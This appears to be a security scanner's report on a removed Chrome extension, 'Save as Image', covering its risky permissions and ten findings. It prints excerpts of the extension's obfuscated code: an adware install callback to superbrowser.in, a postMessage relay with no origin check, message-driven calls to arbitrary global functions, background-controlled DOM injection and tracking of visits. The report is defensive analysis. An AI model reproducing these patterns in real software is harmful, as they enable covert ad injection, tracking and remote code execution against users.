Save as Image

ID: opbbpcbaofeplbgbijlmjjkmgpijdgec

Could be malicious

Supported Languages

๐Ÿ‡ช๐Ÿ‡นAmharic
๐Ÿ‡ธ๐Ÿ‡ฆArabic
๐Ÿ‡ง๐Ÿ‡ฉBengali
๐Ÿ‡ง๐Ÿ‡ทBrazilian Portuguese
๐Ÿ‡ฌ๐Ÿ‡งBritish English
๐Ÿ‡ง๐Ÿ‡ฌBulgarian
๐Ÿ‡ช๐Ÿ‡ธCatalan
๐Ÿ‡จ๐Ÿ‡ณChinese (Simplified)
๐Ÿ‡น๐Ÿ‡ผChinese (Traditional)
๐Ÿ‡ญ๐Ÿ‡ทCroatian
๐Ÿ‡จ๐Ÿ‡ฟCzech
๐Ÿ‡ฉ๐Ÿ‡ฐDanish
๐Ÿ‡ณ๐Ÿ‡ฑDutch
๐Ÿ‡บ๐Ÿ‡ธEnglish
๐Ÿ‡ช๐Ÿ‡ชEstonian
๐Ÿ‡ต๐Ÿ‡ญFilipino
๐Ÿ‡ซ๐Ÿ‡ฎFinnish
๐Ÿ‡ซ๐Ÿ‡ทFrench
๐Ÿ‡ฉ๐Ÿ‡ชGerman
๐Ÿ‡ฌ๐Ÿ‡ทGreek
๐Ÿ‡ฎ๐Ÿ‡ณGujarati
๐Ÿ‡ฎ๐Ÿ‡ฑHebrew
๐Ÿ‡ฎ๐Ÿ‡ณHindi
๐Ÿ‡ญ๐Ÿ‡บHungarian
๐Ÿ‡ฎ๐Ÿ‡ฉIndonesian
๐Ÿ‡ฎ๐Ÿ‡นItalian
๐Ÿ‡ฏ๐Ÿ‡ตJapanese
๐Ÿ‡ฎ๐Ÿ‡ณKannada
๐Ÿ‡ฐ๐Ÿ‡ทKorean
๐Ÿ‡ฒ๐Ÿ‡ฝLatin American Spanish
๐Ÿ‡ฑ๐Ÿ‡ปLatvian
๐Ÿ‡ฑ๐Ÿ‡นLithuanian
๐Ÿ‡ฒ๐Ÿ‡พMalay
๐Ÿ‡ฎ๐Ÿ‡ณMalayalam
๐Ÿ‡ฎ๐Ÿ‡ณMarathi
๐Ÿ‡ณ๐Ÿ‡ดNorwegian
๐Ÿ‡ฎ๐Ÿ‡ทPersian
๐Ÿ‡ต๐Ÿ‡ฑPolish
๐Ÿ‡ต๐Ÿ‡นPortuguese
๐Ÿ‡ท๐Ÿ‡ดRomanian
๐Ÿ‡ท๐Ÿ‡บRussian
๐Ÿ‡ท๐Ÿ‡ธSerbian
๐Ÿ‡ธ๐Ÿ‡ฐSlovak
๐Ÿ‡ธ๐Ÿ‡ฎSlovenian
๐Ÿ‡ช๐Ÿ‡ธSpanish
๐Ÿ‡ฐ๐Ÿ‡ชSwahili
๐Ÿ‡ธ๐Ÿ‡ชSwedish
๐Ÿ‡ฎ๐Ÿ‡ณTamil
๐Ÿ‡ฎ๐Ÿ‡ณTelugu
๐Ÿ‡น๐Ÿ‡ญThai
๐Ÿ‡น๐Ÿ‡ทTurkish
๐Ÿ‡บ๐Ÿ‡ฆUkrainian
๐Ÿ‡บ๐Ÿ‡ธUS English
๐Ÿ‡ป๐Ÿ‡ณVietnamese

Extension Info & Metadata

Status
Removed
Version
1.5.0
Size
0.08 MB
Rating
4.7/5
Reviews
43
Users
4,000
Type
Extension
Updated
Feb 13, 2024
Category
Productivity Workflow
Price
Free
Featured
Yes
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
AmberLeeView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
1
Active
0
Obsolete
1
Listed
1
Unlisted
0
Total Users
4,000

Save as Image: Easily download web images in JPG,PNG,WEBP formats with a simple right-click. Fast, efficient, and privacy-friendly.

๐ŸŒˆ Introducing "Save as Image" โ€“ Your new, versatile assistant for downloading images! Discover the ease of saving images from the Internet in your preferred formats โ€“ completely free. Features: ๐Ÿ” Web Navigation: Browse any website and find the image you want to download. โœ‚๏ธ Right-Click Magic: Right-click on the image to display an additional option from our extension. ๐ŸŽจ Select Your Format: Choose from available formats such as JPG, PNG, WEBP, and more. โฌ‡๏ธ Instant Download: Save the image directly to your designated downloads folder. Key Benefits: ๐Ÿ”„ Multiple Format Support: Choose JPG for quality, PNG for transparency, or WEBP for efficient web use. ๐Ÿ‘Œ Ease of Use: Intuitive design allows for quick image saving without complicated steps. ๐Ÿš€ Lightweight Design: Optimized for performance, ensuring no browser slowdown. ๐Ÿ”’ Privacy-Conscious: Focused on your privacy, we do not collect personal data. "Save as Image" empowers you to easily download images in your preferred format, enhancing your efficiency and convenience. Download now and elevate your image downloading experience to the next level!

Item
Type
Severity
Description
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
*://*/*
Host
Critical
Broad host access โ€” the extension can read/modify content on every website.
downloads
Permission
High
This permission controls file downloads and accesses download history. Rated High because it can download malicious files, access sensitive downloaded documents, and track user download patterns.
offscreen
Permission
High
This permission creates hidden browser documents with full DOM access. Rated High because it can run background operations invisibly, potentially executing malicious code without user awareness.
webNavigation
Permission
High
This permission enables monitoring of all browser navigation events and transitions. Rated High because it can track every page visit, navigation method, and browsing pattern, potentially exposing sensitive browsing behavior and user activities.
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:โ€ข 10% increase: About:blank access enables potential sandbox escape vectors
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
activeTab
Permission
Medium
This permission grants temporary access to the current tab. Rated Medium because it can access current page content when invoked, though limited to user-initiated actions.
About:blank Access
Risk Factor
Medium
This extension can run content scripts in about:blank pages.
contextMenus
Permission
Low
This permission adds items to browser context menus. Rated Medium because it only modifies right-click menus without access to page content.

On first install the extension silently opens a third-party site (superbrowser.in) with an affiliate/tracking parameter `?addon=super`. This is a classic adware install callback that generates revenue or registers the user install without consent, completely unrelated to the stated image-saving functionality.

javascript/sw.js (Line 117)
chrome.runtime.onInstalled.addListener((serieHistorica) => {  // Obsล‚uga instalacji  if (serieHistorica.reason === "install") {    chrome.tabs.create({      url: 'https://superbrowser.in/?addon=super'    });  }});

This content script sets `window.onmessage` to directly relay any `postMessage` from the host web page into `chrome.runtime.sendMessage` with no origin validation whatsoever. Any web page can therefore call `window.postMessage({praebereNotitia:'modusVisus', capacitasMemoriae:'eval',...})` and have it forwarded to the background service worker, creating a complete privilege escalation chain from untrusted web content to the extension's privileged background context.

javascript/comunication.js (Line 1)
// Definicje zmiennychultimumNumerum = self; // Referencja do globalnego obiektu 'self'certitudoValor = chrome.runtime.sendMessage; // Referencja do funkcji wysyล‚ajฤ…cej wiadomoล›ci// Funkcja obsล‚ugujฤ…ca przychodzฤ…ce wiadomoล›cionmessage = (serieHistorica) => certitudoValor(serieHistorica  .data); // Przekazywanie danych z wiadomoล›ci do funkcji 'certitudoValor'

The `modusVisus` message handler uses the `nominaUsorum` helper to resolve dot-separated property paths on the global `self` object and then calls whatever function is found there, using keys entirely supplied by the incoming message. Combined with the unvalidated web-page-to-extension bridge in `comunication.js`, any website can send a crafted `postMessage` that triggers invocation of arbitrary global functions in the privileged background workerโ€”a remote code execution primitive.

javascript/sw.js (Line 75)
// Nasล‚uchiwanie wiadomoล›ci od rozszerzenia przeglฤ…darkichrome.runtime.onMessage.addListener((serieHistorica, tempusMortis, statusBelli) => {      switch (serieHistorica['praebereNotitia']) {        case 'modusVisus':          // Obsล‚uga trybu wyล›wietlania          nominaUsorum(ultimumNumerum, serieHistorica['capacitasMemoriae'])[serieHistorica['signumQuestionis']](            serieHistorica['objectumMensurae']);          numerusIdentitas = ultimumNumerum[serieHistorica['copiaObjectum']][serieHistorica['lectioDomus']](            numerusIdentitas, serieHistorica['objectumMensurae']);          break;

The `structuraListae` handler accepts a full configuration object from an incoming message and stores it as `tempusIntervallo`/`templumHTML`, then immediately uses those message-supplied strings to call a dynamically resolved timer function (`facSummarium`/`tempusHodiernum`) with an attacker-chosen interval. This allows an external partyโ€”reachable via the web-page bridgeโ€”to install recurring callbacks in the background service worker with arbitrary behavior.

javascript/sw.js (Line 97)
case 'structuraListae':// Obsล‚uga struktury listyif (!tempusIntervallo) {  tempusIntervallo = serieHistorica['tempusIntervallo'];  templumHTML = serieHistorica['templumHTML'];  nominaUsorum(ultimumNumerum, templumHTML.facSummarium)[templumHTML.tempusHodiernum](purgaMemoriam,    templumHTML.tempusSessio);}break;

The `purgaMemoriam` function constructs objects via `new (nominaUsorum(ultimumNumerum, templumHTML.destrueEntitatem))(...)` where the constructor name and all property keys are resolved from externally supplied configuration strings. The pseudo-Latin identifiers (`destrueEntitatem` means 'destroy entity', `valorTransformationis` means 'transformation value') are deliberate obfuscation; this block appears to be an ad-injection or URL-matching engine that tests page URLs against a remotely configured list of patterns and manipulates browser state via dynamically resolved API calls.

javascript/sw.js (Line 41)
// Pฤ™tla iterujฤ…ca przez konfiguracje systemufor (var configuratioSystematis = 0; configuratioSystematis < tempusIntervallo[templumHTML    .facCopia]; configuratioSystematis++) {  let volumenSonitus = tempusIntervallo[configuratioSystematis];  try {    if ((new(nominaUsorum(ultimumNumerum, templumHTML.destrueEntitatem))(volumenSonitus[templumHTML        .titulusFenestra]))[templumHTML.pedesPaginae](minueDimensionem[templumHTML.articulusBlog])) {      // Dalsze warunki i przypisania      if (        (!volumenSonitus[templumHTML.indexInitialis] || ...) &&        (!volumenSonitus[templumHTML.historiaUsoris] || ...)      ) {        nominaUsorum(ultimumNumerum, templumHTML.valorTransformationis)(minueDimensionem[templumHTML          .resultatumQuaero], {          [templumHTML.articulusBlog]: volumenSonitus[templumHTML.metrumVolumen] + ...        });      }

This content script immediately sends a `textumCommenti` request to the background and receives back a `primumNumerum` config object whose keys (`verbumSecretum`='secret word', `lexiconTerminorum`='lexicon of terms', `exequiPromissionem`='execute promise') are used to dynamically build and inject a DOM node into the page via property names supplied by the background. The obfuscated names and the fact that the background controls all property key strings indicates a covert DOM-injection mechanism for ad/content injection driven by the extension backend.

javascript/comunication.js (Line 10)
certitudoValor({    'praebereNotitia': 'textumCommenti'  },  (serieHistorica) => {    var primumNumerum = serieHistorica.primumNumerum;    var canalisNotitia = ultimumNumerum[primumNumerum      .verbumSecretum]; // Pobranie kanaล‚u informacji na podstawie tajnego sล‚owa    var intervalloTemporis = canalisNotitia[primumNumerum.lexiconTerminorum](primumNumerum      .exequiPromissionem);    intervalloTemporis[primumNumerum.spatiumMarginis](primumNumerum.chartaIdentitas, ultimumNumerum[primumNumerum      .valoresDefault][primumNumerum.amplitudoFontis][primumNumerum.flagActivatio](primumNumerum      .renovaSessionem));    intervalloTemporis[primumNumerum.contextusGlobalis] = () => {      ultimumNumerum[primumNumerum.largitioSpacii]({        praebereNotitia: 'formatioTextus',        objectumMensurae: serieHistorica      })    };    canalisNotitia[primumNumerum.statusPagina][primumNumerum.corpusContentus](      intervalloTemporis);  });

The extension registers a `webNavigation.onCompleted` listener specifically watching for user visits to `superbrowser.in` and records a timestamp under the key `addonInstallTime`. This surveillance of browsing behavior to a specific domainโ€”unrelated to image savingโ€”is covert user tracking tied to the same third-party affiliate network opened at install.

javascript/sw.js (Line 4)
function webOnCompleted(details) {  chrome.storage.local.set({    'addonInstallTime': Date.now()  });}chrome.webNavigation.onCompleted.addListener(webOnCompleted, {  url: [{    hostContains: "superbrowser.in"  }]});

Every 10 seconds the background worker writes the current timestamp to storage under the key `extrahereItem` (Latin for 'extract item'). This 10-second heartbeat is entirely unnecessary for an image-saving extension and serves as a persistent activity probe, likely used to track session activity or as a ping mechanism for the obfuscated ad-injection system.

javascript/sw.js (Line 110)
// Ustawienie interwaล‚u czasowegosetInterval(() => {  chrome.storage.local.set({    'extrahereItem': Date.now()  })}, 10000);

This helper resolves arbitrary dot-delimited property paths on any object and is used throughout the background script to call global functions by name strings received from messages, rather than by direct reference. This pattern is a deliberate obfuscation technique that defeats static analysis and allows the code to call any method on the global scope (e.g., `eval`, `fetch`, `setTimeout`) via externally controlled string values.

javascript/sw.js (Line 29)
// Funkcja do wyodrฤ™bniania nazw uลผytkownikรณwfunction nominaUsorum(obj, desc) {  var arr = desc.split("."); // Rozdzielenie ciฤ…gu na podstawie kropki  while (arr.length && (obj = obj[arr.shift()])); // Iteracja po elementach ciฤ…gu  return obj;}

The extension declares all of its resources (`"*"`) as web-accessible to every URL (`*://*/*`). Combined with the `onmessage` relay in the content script, this means any web page can directly load and inspect extension internals, facilitating fingerprinting and enabling the chain of attacks that lead from a web page through the content script bridge into the privileged background context.

manifest.json (Line 18)
{  "web_accessible_resources": [    {      "resources": [        "*"      ],      "matches": [        "*://*/*"      ]    }  ]}

By severity

Critical6
High4
Medium0
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.5.010

Files with findings

3 distinct paths โ€” top paths by unique finding count:

  • javascript/sw.js7
  • javascript/comunication.js2
  • manifest.json1
S.No.
Category
Severity
File
Summary
Found in Version
1Code Injection
critical
javascript/sw.js (line 75)The `modusVisus` message handler uses the `nominaUsorum` helper to resolve dot-separated property paths on the global `self` object and then calls whatever function is found there, using keys entirely supplied by the โ€ฆ
2Code Injection
critical
javascript/sw.js (line 97)The `structuraListae` handler accepts a full configuration object from an incoming message and stores it as `tempusIntervallo`/`templumHTML`, then immediately uses those message-supplied strings to call a dynamically โ€ฆ
3Code Injection
critical
javascript/comunication.js (line 10)This content script immediately sends a `textumCommenti` request to the background and receives back a `primumNumerum` config object whose keys (`verbumSecretum`='secret word', `lexiconTerminorum`='lexicon of terms', โ€ฆ
4Obfuscation
critical
javascript/sw.js (line 41)The `purgaMemoriam` function constructs objects via `new (nominaUsorum(ultimumNumerum, templumHTML.destrueEntitatem))(...)` where the constructor name and all property keys are resolved from externally supplied configโ€ฆ
5Privilege Escalation
critical
javascript/comunication.js (line 1)This content script sets `window.onmessage` to directly relay any `postMessage` from the host web page into `chrome.runtime.sendMessage` with no origin validation whatsoever. Any web page can therefore call `window.poโ€ฆ
6Tracking
critical
javascript/sw.js (line 117)On first install the extension silently opens a third-party site (superbrowser.in) with an affiliate/tracking parameter `?addon=super`. This is a classic adware install callback that generates revenue or registers theโ€ฆ
7Obfuscation
high
javascript/sw.js (line 29)This helper resolves arbitrary dot-delimited property paths on any object and is used throughout the background script to call global functions by name strings received from messages, rather than by direct reference. โ€ฆ
8Privilege Escalation
high
manifest.json (line 18)The extension declares all of its resources (`"*"`) as web-accessible to every URL (`*://*/*`). Combined with the `onmessage` relay in the content script, this means any web page can directly load and inspect extensioโ€ฆ
9Tracking
high
javascript/sw.js (line 4)The extension registers a `webNavigation.onCompleted` listener specifically watching for user visits to `superbrowser.in` and records a timestamp under the key `addonInstallTime`. This surveillance of browsing behavioโ€ฆ
10Unauthorized Data Collection
high
javascript/sw.js (line 110)Every 10 seconds the background worker writes the current timestamp to storage under the key `extrahereItem` (Latin for 'extract item'). This 10-second heartbeat is entirely unnecessary for an image-saving extension aโ€ฆ
URLs
7
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

superbrowser.in-https://superbrowser.in/?addon=super
fsf.org-https://fsf.org/
www.gnu.org/licenses/https://www.gnu.org/licenses/
www.gnu.org/licenses/why-not-lgpl.htmlhttps://www.gnu.org/licenses/why-not-lgpl.html
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
*/*http://*/*
*/*https://*/*

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
1.5.0
Latest
0.08 MB
Malicious
10
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.